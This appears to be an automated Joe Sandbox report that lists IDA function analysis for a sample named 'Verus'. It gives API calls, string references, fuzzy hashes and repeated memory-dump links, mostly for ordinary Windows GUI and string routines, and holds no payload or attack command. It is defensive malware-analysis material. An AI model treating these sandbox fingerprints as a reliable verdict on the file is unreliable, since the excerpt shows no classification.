Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$ActiveEnablePropertySheetShowText
String ID: (HL
API String ID: 3414902578-2396325628
Opcode ID: 7a3d5aded504d553e84a0dee16a9098cad7692b1ee3c46580519c73efe975c0a
Instruction ID: 489f9ef6879e487c79eb1f3b3757531744fb1833cc5997393e84ca281e36b1c0
Opcode Fuzzy Hash: 7a3d5aded504d553e84a0dee16a9098cad7692b1ee3c46580519c73efe975c0a
Instruction Fuzzy Hash: 9C5185B16043406BD324EB659996E6BB7E8BFC8705F40052EF686A32C2DE785844C77E

Function 0045C2B0 Relevance: 10.7, APIs: 7, Instructions: 160stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,?,AD5E0258,?,40000000,00000000,00000000), ref: 0045C304

Part of subcall function 00477190: lstrlenW.KERNEL32(?,74E2F860,?,?,00416C4B,?), ref: 0047719E
Part of subcall function 00477190: lstrlenW.KERNEL32(?,?,00416C4B,?), ref: 004771B5
Part of subcall function 00477190: lstrlenW.KERNEL32(?,?,00416C4B,?), ref: 004771D4

Part of subcall function 0046EE90: lstrcmpW.KERNEL32(?,40000000,?,40000000,?,40000000,0045C32D,?,?), ref: 0046EEDA

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

lstrcpyW.KERNEL32(00000000,00000000,?), ref: 0045C39C
lstrcatW.KERNEL32(00000000,00000000), ref: 0045C3AC
lstrcatW.KERNEL32(00000000,004CA150), ref: 0045C3B8
lstrcpyW.KERNEL32(?,?), ref: 0045C3D7
SHGetFileInfoW.SHELL32(004C49AC,00000010,?,000002B4,00000410), ref: 0045C3F2
lstrcpyW.KERNEL32(?,004C49AC), ref: 0045C41F

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat$FileInfo_malloclstrcmp
String ID:
API String ID: 2547516183-0
Opcode ID: 4511c18e920b7be33fb76adf585dfbaddc6d5761e5f68871ff0ed6fc031cb273
Instruction ID: ea7672739ac1a497ef070fdb5d37e23f7f7ddfe1cccfaae9b80f5029daf2972e
Opcode Fuzzy Hash: 4511c18e920b7be33fb76adf585dfbaddc6d5761e5f68871ff0ed6fc031cb273
Instruction Fuzzy Hash: B051C8B1204704AFD360DB51DD91FABB7EDFBC4704F40492EB54687291DA78B804CB66

Function 0045A4F0 Relevance: 10.7, APIs: 7, Instructions: 159windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,00008016,00000000), ref: 0045A53D
EnableMenuItem.USER32(?,00008017,00000000), ref: 0045A59A
EnableMenuItem.USER32(?,00008016,00000001), ref: 0045A5EA
EnableMenuItem.USER32(?,00008017,00000001), ref: 0045A623
EnableMenuItem.USER32(?,00008016,00000000), ref: 0045A65A
EnableMenuItem.USER32(?,00008048,00000000), ref: 0045A6C3

Part of subcall function 00432010: SendMessageW.USER32(?,00000401,?,?), ref: 00432024

EnableMenuItem.USER32(?,00008048,00000001), ref: 0045A6F6

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: EnableItemMenu$MessageSend
String ID:
API String ID: 224965116-0
Opcode ID: 124f42ed3774a00ce113d854676f349e9837639cd4579ee4c77e406887186338
Instruction ID: ad0bc6257164b0bc340ba1264b0a33b2f479be3ebece41a65727d1f9e3e0efcd
Opcode Fuzzy Hash: 124f42ed3774a00ce113d854676f349e9837639cd4579ee4c77e406887186338
Instruction Fuzzy Hash: CF41247178130076EA64A7555C47F7A3392AB94F15F04812ABF813F2D28EEA6C4CD39E

Function 004B2580 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004B25A4
_memset.LIBCMT ref: 004B25B7

Strings

*UDF DVD CGMS Info, xrefs: 004B26F8
*OSTA UDF Compliant, xrefs: 004B2690
*UDF LV Info , xrefs: 004B264F
*UDF FreeEASpaceBEA01, xrefs: 004B26CC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _memset
String ID: *OSTA UDF Compliant$*UDF DVD CGMS Info$*UDF FreeEASpaceBEA01$*UDF LV Info
API String ID: 2102423945-2580012452
Opcode ID: b018e6e60a7b0645da89b73769cdfd9187c0b9422985a357041a2b6ce752bb97
Instruction ID: 1c421b1acc1b30ff9757faacceea96f6868b96111c24473b14b0add9b12899ec
Opcode Fuzzy Hash: b018e6e60a7b0645da89b73769cdfd9187c0b9422985a357041a2b6ce752bb97
Instruction Fuzzy Hash: E851A274904288BBDB01DF68DC52BDE7F726F15748F088099E9842B383C6BA9654C7F9

Function 00470810 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133stringwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

lstrcpyW.KERNEL32 ref: 00470889
lstrcpyW.KERNEL32(?,004CA150), ref: 0047089A
_memset.LIBCMT ref: 00470913
SendMessageW.USER32(00000000,00001132,00000000,?), ref: 0047097E
SendMessageW.USER32(00000000,00001102,00000002,?), ref: 004709A7

Strings

g, xrefs: 00470949

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSendlstrcpy$_malloc_memset
String ID: g
API String ID: 319676817-30677878
Opcode ID: 53a90c56b6ece5bf54201bad879e9978b791eb9efb5937c80063a319b1baa6cf
Instruction ID: f1ffd1ebd86aad648be80ac26df491a2b78ce2a51855d97156a8fd13f6ab14af
Opcode Fuzzy Hash: 53a90c56b6ece5bf54201bad879e9978b791eb9efb5937c80063a319b1baa6cf
Instruction Fuzzy Hash: 72511AB5604340AFD754CF28C881B5ABBE5FB88714F008A2EFA8897391D775E944CB96

Function 00442D80 Relevance: 10.6, APIs: 7, Instructions: 122COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00442DC2
ImageList_Draw.COMCTL32(?,?,?,?,00000001,00000001), ref: 00442E1A
ReleaseDC.USER32(?,?), ref: 00442E25
BeginPaint.USER32 ref: 00442E45
ImageList_Draw.COMCTL32(?,?,?,?,00000001,00000001), ref: 00442EA2
ReleaseDC.USER32(?,?), ref: 00442EB1
EndPaint.USER32(?,?), ref: 00442EC1

Part of subcall function 00442BF0: GetSysColorBrush.USER32 ref: 00442C42
Part of subcall function 00442BF0: FillRect.USER32(?,0000000F,00000000), ref: 00442C4F
Part of subcall function 00442BF0: GetSysColor.USER32(0000000F), ref: 00442C88

Part of subcall function 00442AB0: GetStockObject.GDI32(00000011), ref: 00442B05
Part of subcall function 00442AB0: SelectObject.GDI32(?,00000000), ref: 00442B17
Part of subcall function 00442AB0: SetBkMode.GDI32(?,00000001), ref: 00442B22
Part of subcall function 00442AB0: SetTextColor.GDI32(?,00000000), ref: 00442B70
Part of subcall function 00442AB0: lstrlenW.KERNEL32(?,?,00008020), ref: 00442BB1
Part of subcall function 00442AB0: DrawTextW.USER32(?,?,00000000), ref: 00442BBA
Part of subcall function 00442AB0: SelectObject.GDI32(?,00000000), ref: 00442BCA

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ColorDrawObject$ImageList_PaintRectReleaseSelectText$BeginBrushClientFillModeStocklstrlen
String ID:
API String ID: 1646704442-0
Opcode ID: db8cfc0adec587bdd3ab241d0c4bdb2e63eb3ebfa1509e6a3fcf48a227d9fea9
Instruction ID: beffdb3a7e5604a1f3de718406963ccb075b29906a6b00ebbd8034a91222ec62
Opcode Fuzzy Hash: db8cfc0adec587bdd3ab241d0c4bdb2e63eb3ebfa1509e6a3fcf48a227d9fea9
Instruction Fuzzy Hash: 204108B1618741AFD314CF28D955E2BB7E9FBC8B14F004A1DB59693390DB74E8048BA6

Function 0044E540 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0044E5BF
GetWindowLongW.USER32(?,000000FC), ref: 0044E5D4
CallWindowProcW.USER32(?,?,00000082,?,?), ref: 0044E5E9
GetWindowLongW.USER32(?,000000FC), ref: 0044E604
SetWindowLongW.USER32(?,000000FC,?), ref: 0044E616

Strings

$, xrefs: 0044E586

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 7c5412eeaf2838a13b5f41e6aabf4e3aa5fdc8c6504e38f1f24534febbcbf949
Instruction ID: ae96b32c210811898f15f91392b3bf26b1f25fb8aba2509de606a35d1383f8b3
Opcode Fuzzy Hash: 7c5412eeaf2838a13b5f41e6aabf4e3aa5fdc8c6504e38f1f24534febbcbf949
Instruction Fuzzy Hash: 5C41F6B1608700AFD368DF1AD98091BF7F8FBD8714F50991EF59A83650D671E8408B55

Function 004325A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0043261F
GetWindowLongW.USER32(?,000000FC), ref: 00432634
CallWindowProcW.USER32(?,?,00000082,?,?), ref: 00432649
GetWindowLongW.USER32(?,000000FC), ref: 00432664
SetWindowLongW.USER32(?,000000FC,?), ref: 00432676

Strings

$, xrefs: 004325E6

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: eec52953e035583c687d6f917b0a23072b794584fce534166ea9d1abaaf64134
Instruction ID: 86060f8c3605cc3cb7338bbd6b8e68df0cb389b44ffb2d8d7c0fc222bda8b5de
Opcode Fuzzy Hash: eec52953e035583c687d6f917b0a23072b794584fce534166ea9d1abaaf64134
Instruction Fuzzy Hash: 3A41E2B1608700AFC368DF19D98092BBBF8FFCC714F109A1EF59A83260D671E9418B65

Function 0045F0A0 Relevance: 10.6, APIs: 7, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0045EA70: LoadBitmapW.USER32(?,000000D8), ref: 0045EA88
Part of subcall function 0045EA70: ImageList_Create.COMCTL32(00000010,00000010,00000020,00000000,00000006), ref: 0045EA9A
Part of subcall function 0045EA70: ImageList_Add.COMCTL32(00000000,00000000,00000000), ref: 0045EAA7
Part of subcall function 0045EA70: DeleteObject.GDI32(00000000), ref: 0045EAAE

Part of subcall function 0045EBE0: GetDlgItem.USER32(?,0000049D), ref: 0045EBF2
Part of subcall function 0045EBE0: GetWindowRect.USER32(00000000,?), ref: 0045EBFE
Part of subcall function 0045EBE0: ScreenToClient.USER32(?,?), ref: 0045EC13
Part of subcall function 0045EBE0: ScreenToClient.USER32(?,?), ref: 0045EC22
Part of subcall function 0045EBE0: SendMessageW.USER32(?,00000430,00000000,?), ref: 0045EC72
Part of subcall function 0045EBE0: SendMessageW.USER32(?,0000041E,00000014,00000000), ref: 0045EC7F
Part of subcall function 0045EBE0: SendMessageW.USER32(00000000,00000401,00000088,00000000), ref: 0045ECB9
Part of subcall function 0045EBE0: SendMessageW.USER32(?,00000401,00000089,00000000), ref: 0045ECC9
Part of subcall function 0045EBE0: SendMessageW.USER32(?,00000418,00000000,00000000), ref: 0045ECD7

GetDlgItem.USER32(?,0000049D), ref: 0045F0BC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 0045F10F
SendMessageW.USER32 ref: 0045F130
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 0045F179
SendMessageW.USER32 ref: 0045F19A
SendMessageW.USER32(00000001,0000101E,00000000,000000FD), ref: 0045F1AC
SendMessageW.USER32(00000001,00001036,00000000,00000020), ref: 0045F1BB

Part of subcall function 0045EEF0: SendMessageW.USER32 ref: 0045EF84
Part of subcall function 0045EEF0: SendMessageW.USER32(0000104D,0000104C,00000000,?), ref: 0045EFD8
Part of subcall function 0045EEF0: SendMessageW.USER32(0000104D,0000104C,00000000,?), ref: 0045F05B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$ClientImageItemList_Screen$BitmapCreateDeleteLoadObjectRectWindow
String ID:
API String ID: 14975544-0
Opcode ID: 3393098bdf7a15477f96bbc5017c59d7efbcd7b189211094d0119ecc86e08d9c
Instruction ID: ba012da411438613736d94f36864b308457fd2f205ebc581d4841b00a9af925b
Opcode Fuzzy Hash: 3393098bdf7a15477f96bbc5017c59d7efbcd7b189211094d0119ecc86e08d9c
Instruction Fuzzy Hash: 0331FEB0644300AFD350DF69C941B5BBBE5AFC8B04F00492EF599DB281D7B8D6448F96

Function 0044CCB0 Relevance: 10.6, APIs: 7, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0044CCCB
RemoveMenu.USER32(?,-00000001,00000400), ref: 0044CCE7
DestroyMenu.USER32 ref: 0044CCF7
MapWindowPoints.USER32(?,00000000,?,00000002), ref: 0044CD28
PeekMessageW.USER32 ref: 0044CD6A
PtInRect.USER32(00000000,00000000,?), ref: 0044CD7F
PeekMessageW.USER32(?,?,00000201,00000201,00000001), ref: 0044CD9E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Menu$MessagePeek$CountDestroyItemPointsRectRemoveWindow
String ID:
API String ID: 638675735-0
Opcode ID: d9d472983010b5e3c7edadcf1d0b02b00b928175d11d15bd54d75dcc43846a11
Instruction ID: c2ef4ef8532f2e3014aeaf1709bce3a99661ee97196f22d23db440fdd1b688dd
Opcode Fuzzy Hash: d9d472983010b5e3c7edadcf1d0b02b00b928175d11d15bd54d75dcc43846a11
Instruction Fuzzy Hash: 60314BB5614300AFD780CF54C9C4E2BBBF8ABC8700F44892EFA59972A1D770E8058BA5

Function 00456090 Relevance: 10.6, APIs: 7, Instructions: 83windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0045609D

Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 00415452
Part of subcall function 00415440: GetParent.USER32 ref: 00415473
Part of subcall function 00415440: GetWindowRect.USER32(?,?), ref: 0041548C
Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 004154A1
Part of subcall function 00415440: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004154C2

GetDlgItem.USER32(?,0000045C), ref: 004560B3
SetWindowLongW.USER32(00000000,000000FC,?), ref: 004560DD
GetDlgItem.USER32(?,0000045E), ref: 004560F5
SetWindowLongW.USER32(00000000,000000FC,?), ref: 0045611F
SendMessageW.USER32(?,000000C5,0000003F,00000000), ref: 00456142
SendMessageW.USER32(?,000000C5,0000003F,00000000), ref: 00456151

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Long$ItemMessageParentSend$InfoParametersRectSystem
String ID:
API String ID: 2579834073-0
Opcode ID: cd809328fbc4c36d854ced3687f4251839c9ced3cad28bda6aa0a42e996dcc32
Instruction ID: 39c5b4654415f98160db039025c03fd167f7a32cc04f44b4dda4e1442942c4f4
Opcode Fuzzy Hash: cd809328fbc4c36d854ced3687f4251839c9ced3cad28bda6aa0a42e996dcc32
Instruction Fuzzy Hash: E3217C71300A12AFD714DB69DD94F67B7E8BB88701B00462AB616C76C2DB74F845CBA8

Function 0044C8B4 Relevance: 10.6, APIs: 7, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000417,00000000,?), ref: 0044C8F4
SendMessageW.USER32(?,0000041D,00000000,?), ref: 0044C922
GetMenuItemCount.USER32(?), ref: 0044C94B
AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 0044C967
_memset.LIBCMT ref: 0044C999
_memset.LIBCMT ref: 0044C9A7
GetMenuItemInfoW.USER32 ref: 0044C9E5
AppendMenuW.USER32(?,00000000,?,?), ref: 0044CA08
GetMenuItemCount.USER32(?), ref: 0044CB1F
DestroyMenu.USER32(?), ref: 0044CB2E
MessageBeep.USER32(000000FF), ref: 0044CB36

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Menu$ItemMessage$AppendCountSend_memset$BeepDestroyInfo
String ID:
API String ID: 2301784159-0
Opcode ID: e3b3797e70cd882d907f2e153060a5f4c311f529a66aea39b0ed68fbc0563cd4
Instruction ID: d8ed3118ac48b4f3c91810c4fba73ae818d767adaa5defce9598454428733380
Opcode Fuzzy Hash: e3b3797e70cd882d907f2e153060a5f4c311f529a66aea39b0ed68fbc0563cd4
Instruction Fuzzy Hash: 252160716093809FE7A0CF65D986BAFB7E4FBC4700F144D2EE68993290D738A444CB5A

Function 00468520 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004680D0: CreateWindowExW.USER32(?,tooltips_class32,?,?,?,?,?,?,00000000,?,?,?), ref: 0046811E

SendMessageW.USER32(?,00000418,00000000,000000C8), ref: 00468568
_memset.LIBCMT ref: 00468573
SendMessageW.USER32 ref: 004685C3
SendMessageW.USER32(?,00000401,00000001,00000000), ref: 004685D1

Strings

PROGRESS, xrefs: 004685E8
,, xrefs: 00468597

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
